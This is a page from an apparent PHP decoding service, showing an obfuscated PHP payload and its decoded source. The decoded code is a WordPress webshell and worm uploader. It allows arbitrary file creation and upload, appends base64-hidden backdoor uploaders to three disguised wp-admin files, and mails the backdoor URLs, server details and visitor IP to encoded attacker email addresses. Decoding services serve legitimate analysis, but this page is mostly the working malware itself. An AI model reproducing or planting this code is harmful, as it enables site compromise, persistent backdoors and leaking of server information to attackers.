Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode('7Vhrb9pKEP1eqf9hayEZlAdgl9sQQnqBgDGkhADGQJKL/FiwiV/C6xhS9b/f..
Decoded Output download
$content = stripslashes($_POST['content']); $cfile = $_POST['cfile']; $ufile = $_POST['ufile'];
echo '<br>'.php_uname().'<br>';
echo '<form action="" method="post" enctype="multipart/form-data" name="aw" id="aw">';
echo '<textarea name=content style="width:585px;height:200px">'.$content.'</textarea><br>';
echo '<input type="text" name="cfile" size="10" value="sohai.php">';
echo '<input name="_create" type="submit" id="_upl" value="Create">';
echo '<input type="file" name="file" size="30"><input type="text" name="ufile" size="10" value="sohai.php">';
echo '<input name="_upload" type="submit" id="_upl" value="Upload"></form>';
if($_POST['_create']){
$handle = fopen($cfile, 'w');
if($handle){
if (fwrite($handle, $content) === FALSE) { echo "Create $cfile GAGAL<br>"; }
else { echo "Create $cfile SUKSES !!!<br>"; } fclose($handle);
} else { echo 'Create File GAGAL<br><br>'; }
}
if($_POST['_upload']){
if(@copy($_FILES['file']['tmp_name'], $ufile)) { echo "Upload $ufile SUKSES !!!<br><br>"; }
else { echo "Upload $ufile GAGAL !!!<br><br>"; }
}
$path1 = $_SERVER['DOCUMENT_ROOT'].'/wp-admin/includes/class-wp-filesystem-intext.php';$path2 = $_SERVER['DOCUMENT_ROOT'].'/wp-admin/network/plugin-function.php';$path3 = $_SERVER['DOCUMENT_ROOT'].'/wp-admin/user/info.php';$content1 = "<?php eval(base64_decode('ZWNobyAnPGI+U29oYWkgUHJpdmF0ZSB1cGxvYWRlcjwvYj4nOwplY2hvICc8Yj48YnI+Jy5waHBfdW5hbWUoKS4nPC9iPic7CmVjaG8gJzxwcmU+PD9waHAgc3lzdGVtKCJscyAtbGEiKTs/PjwvcHJlPic7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7ZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7aWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkge2lmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTdWNjZXNzICEhITwvYj48YnI+PGJyPic7IH0JZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsICEhITwvYj48YnI+PGJyPic7IH0KfQ=='));?>";$content2 = "<?php eval(base64_decode('ZWNobyAnPGI+U29oYWkgUHJpdmF0ZSB1cGxvYWRlcjwvYj4nOwplY2hvICc8Yj48YnI+Jy5waHBfdW5hbWUoKS4nPC9iPic7CmVjaG8gJzxwcmU+PD9waHAgc3lzdGVtKCJscyAtbGEiKTs/PjwvcHJlPic7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7ZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7aWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkge2lmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTdWNjZXNzICEhITwvYj48YnI+PGJyPic7IH0JZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsICEhITwvYj48YnI+PGJyPic7IH0KfQ=='));?>";$content3 = "<?php eval(base64_decode('ZWNobyAnPGI+U29oYWkgUHJpdmF0ZSB1cGxvYWRlcjwvYj4nOwplY2hvICc8Yj48YnI+Jy5waHBfdW5hbWUoKS4nPC9iPic7CmVjaG8gJzxwcmU+PD9waHAgc3lzdGVtKCJscyAtbGEiKTs/PjwvcHJlPic7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7ZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7aWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkge2lmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTdWNjZXNzICEhITwvYj48YnI+PGJyPic7IH0JZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsICEhITwvYj48YnI+PGJyPic7IH0KfQ=='));?> ";$txt = fopen($path1,"a+");fwrite($txt, $content1);$txt = fopen($path2,"a+");fwrite($txt, $content2);$txt = fopen($path3,"a+");fwrite($txt, $content3);fclose($txt);$info = base64_decode("bWFpbGxpc3Q1N0B5bWFpbC5jb20=");$info2 = base64_decode("c29oYWluZXdiaWVAeWFob28uY29t");$info3 = base64_decode("c29oYWluZXdiaWVAZ21haWwuY29t");($safe_mode)?($type="ON"):($type="worm-uploader");$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];$base1="http://".$_SERVER['HTTP_HOST'].'/wp-admin/includes/class-wp-filesystem-intext.php';$base2="http://".$_SERVER['HTTP_HOST'].'/wp-admin/network/plugin-function.php';$base3="http://".$_SERVER['HTTP_HOST'].'/wp-admin/user/info.php';$name = php_uname(); $ip = getenv("REMOTE_ADDR");$ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]);$subj = $_SERVER['HTTP_HOST'];$cernel = "
Webackdoor: $base
Uname : $name
Infection1 : $base1
Infection2 : $base2
Infection3 : $base3
IP: $ip
Host: $ip2 $p_code";$from ="From: ".$writ."_^_".$type."<tool@".$_SERVER['HTTP_HOST'].">";mail( $info,$subj, $cernel, $from);mail( $info2,$subj, $cernel, $from);mail( $info3,$subj, $cernel, $from);Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode('7Vhrb9pKEP1eqf9hayEZlAdgl9sQQnqBgDGkhADGQJKL/FiwiV/C6xhS9b/fWRsHSJv08fHeICS8s3POzOyetcekNNch2CGojHyyND3fUnwD++nUtHvVH9ywm2n2LlNCKW1mWhg8nybpmL2DmeDZTLCZef8Oa4aL2DN1ec4ee4Y3DRzFxunMcWzaOszcpY0UjZiuU2YYZGNiuHqZ8VyfMAg7Gll7uMzYgUVMT1mSLPU/0hWiMIgylhklZJCpR7+7vASviLLESuyVVOuTtQWY0NSJcVo4KXirkoHNuUFOuVzOWwHDcWrjC5lmE5LzZ0mbjhcQFKdGfZJcooVhkG8+wiCfY9CDYgVw6buGYtJlYL5niZFTDcIQwMakfqDaJokLmwae9cRUi91eSiaOH1Pu5sLnmPMXsw7+PGtIzVX0n2YtxW7nZ9H2RWzm7Elrm9pBa1/fv0PwSRmKo0e6mrkedtKxAA8RG7KZUuxC4bFXAoqtKD0LlybByewhSvYzg8rlMmpULvv1DPqKomo2y5koXKgIlUu61UwJfduyYsvHLyD6Urtf76MPHz4kMDTTLNd/ip/k+22Phd2wNPaixiKjkb/tr0+8ytv1gbm/Nddbg0dDvKz3b9j42N2wxPamdGvYu8PN4cxsi413ITm0+6nvV71X8T4syvZ7FHxTnkKMfHQz6Nd7w3rvhr24qklf6p3BtHd1NWDvjtls6B0pum06WdPRrEDHflaDO49/BHZK7699gu0j06H6pNJjSxEt96u0Diahu7zPelYwN52jWeBEt5YdKv5XqQIfLyHNmbsBb3REK2TOPoMNYZB3WlV8/NfHqY41V8dpdiJ3XHVdcbqCeCBxRXcs38+lZsvT7UZu0q/mNWH1MJZ7lrYIH8aLj85V6FljzngQa9oJjE/GjnjQWhdCpVmd6XLBUGXJbfc/Ot1a0eya2qeaPVwowsm89bgKNVs66F4Uwbcy13jrUReGpF1r+dq6QlShbrYHfrYLcbRmy3qGtVW+RUShsdAF60Fd5EzRrJLJqOeq3HVRdKoPGn9tisIwGPO9giZIRdHO59Vmz9OExlqvFSP8pdwzdIgjClGegBuGqlA0JsJwDXze5CJn6qOqr3KN+8lIjPLfro8VaM1hTmwm/BNPFaQtVzJudjxsw3ghhSKsjyIXQn10PVftBpkMcuaIh5g1ca43rZCONX5oqrKVS+I/zdsNX6e81ibHmnjQ3dRB81LksSvWejOpXhwMG74T43RdvMgVxVprGO8brEntfo45y27XqwuVrxbagOndW196w47a4qKcndHQd3QhH464qBZn1A/nrUZR6EurhpT3nYlt+ZO+rstrPRjLeauVz3ntfvUTrHeyP2b3Kc/qQJc7i8mo8yjW6oY4iHQT6aQrtNY0d7GZa03k1ePkZQ5hLFv+K/j27LpcZjOZ0mc40InUuTepv0n9/yF1/k3qb1L/L0sdgdbJimx76qhbO2SUAyZTSnpmcNg2zPnMDxDcawjuRwj+NQQP9k2/DHaA034L8PvHj1HlBmzBygP55ju5aiEa1woLlcuVmQ2K+x6mRSfVCiYj3VTkYQXLDTgJJ8GYK5IExv8cNuHyhiKHCSyd8pUZntrgm/kMeUevPlcdJnOaDEL6jho37XhJA9EAZcYgxDvNZpnjbfvZHAy60yZ0+dB6bq29+rVU7w+mUk+Ed+kInf8p/I96a0rN/Q716/01peN/h+55j03fXWBDdv4wKKGU6YFpjkEvD2mmV/9yNahPKxcXvWgLPS6eNFyfqGtF15fpp6g7vnfgC6+ni73mfycpeBDgpYMt+hi4dWSsKtq97rrLUxQVdetIUWr0AyZ6feuIzgxH1efRxi2/Y+QSI7dj5BMjD8buKa3t1mlC6tElh1LelGoQzups6dqozDTg5xTBStLTc8xM/5nCNVXZMXNGXNf6+6VFZuDhZiumlUaRzA+j6unBi8qECxogs+vC/YIP/5LPvw=='))); Function Calls
| gzinflate | 1 |
| base64_decode | 1 |
Stats
| MD5 | b934e719116ec839032a97d8c13a7190 |
| Eval Count | 1 |
| Decode Time | 85 ms |